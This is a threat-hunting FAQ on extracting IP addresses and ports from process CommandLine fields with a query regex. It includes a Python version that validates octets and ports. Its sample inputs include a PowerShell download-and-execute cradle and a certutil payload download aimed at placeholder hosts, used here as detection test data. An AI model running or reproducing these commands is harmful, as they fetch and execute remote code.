FAQ: How do I extract an IP Address from the CommandLine field?

When building a profile of a process or hunting for suspicious network activity, you may need to pull an IP address out of the CommandLine field (for example the host in a download URL passed to powershell.exe or certutil.exe). Use the regex() function with named capture groups; each group becomes a field you can filter or aggregate on later in the query:

| regex("(?<ip>[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\:(?<port>\d{2,5})", field=CommandLine)

This yields two new fields, ip and port. Two things to keep in mind: the pattern only matches an address that is immediately followed by a colon and a port, so a bare address such as http://198.51.100.7/payload.exe will not produce a hit unless you drop the port part of the pattern; and [0-9]{1,3} does not check that each octet is 255 or less, so it will also match strings such as 999.1.2.3 or the first four components of a longer version number. Filter on the extracted ip field afterwards if that matters for your hunt.
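The same extraction run in Python over constructed CommandLine values, as an added example that is not part of this FAQ or of the query language itself. It generalizes the query above in two ways: the :port suffix is optional so bare addresses are also returned, and each octet is checked to be 255 or less so version strings and malformed addresses are discarded. Note that Python names capture groups with (?P<name>...), whereas the query uses (?<name>...); the sample command lines and the extract_ip_port helper are assumptions made for the example.

```python
import re

# Named groups mirror the query's ip and port fields. The lookbehind and
# lookahead stop the pattern from matching in the middle of a longer
# dotted number (e.g. a build version such as 10.0.19041.1).
IP_PORT_RE = re.compile(
    r"(?<![0-9.])"                              # not preceded by a digit or dot
    r"(?P<ip>(?:[0-9]{1,3}\.){3}[0-9]{1,3})"    # four dotted octets
    r"(?::(?P<port>\d{1,5}))?"                  # optional :port suffix
    r"(?![0-9.])"                               # not followed by a digit or dot
)

# Constructed sample CommandLine values (not real telemetry).
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45:8080/a.ps1\')"',
    r"certutil.exe -urlcache -split -f http://198.51.100.7/payload.exe C:\Users\Public\p.exe",
    r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
    r"msiexec.exe /i C:\Temp\setup-10.0.19041.1.msi /qn",
    r"net.exe use Z: \\256.10.10.10\share /user:guest",
]


def extract_ip_port(command_line):
    """Return a list of (ip, port) tuples found in one CommandLine string.

    port is None when no :port suffix was present or the port was out of
    range. Candidates with an octet above 255 are dropped, which is the
    check the query's [0-9]{1,3} alone does not perform.
    """
    hits = []
    for m in IP_PORT_RE.finditer(command_line):
        ip = m.group("ip")
        if not all(int(octet) <= 255 for octet in ip.split(".")):
            continue
        port = m.group("port")
        if port is not None and not 0 < int(port) <= 65535:
            port = None
        hits.append((ip, port))
    return hits


def extract_all(command_lines):
    """Run the extraction over many CommandLine values, keeping only hits."""
    results = {}
    for cmd in command_lines:
        found = extract_ip_port(cmd)
        if found:
            results[cmd] = found
    return results


if __name__ == "__main__":
    for cmd, found in extract_all(SAMPLE_COMMAND_LINES).items():
        print(found, "<-", cmd[:60])
```

In the sample set only the PowerShell and certutil lines produce hits; the build number in the msiexec line and the impossible 256.x.x.x address are rejected, which is the behaviour you would otherwise have to add as a filter after the regex() stage.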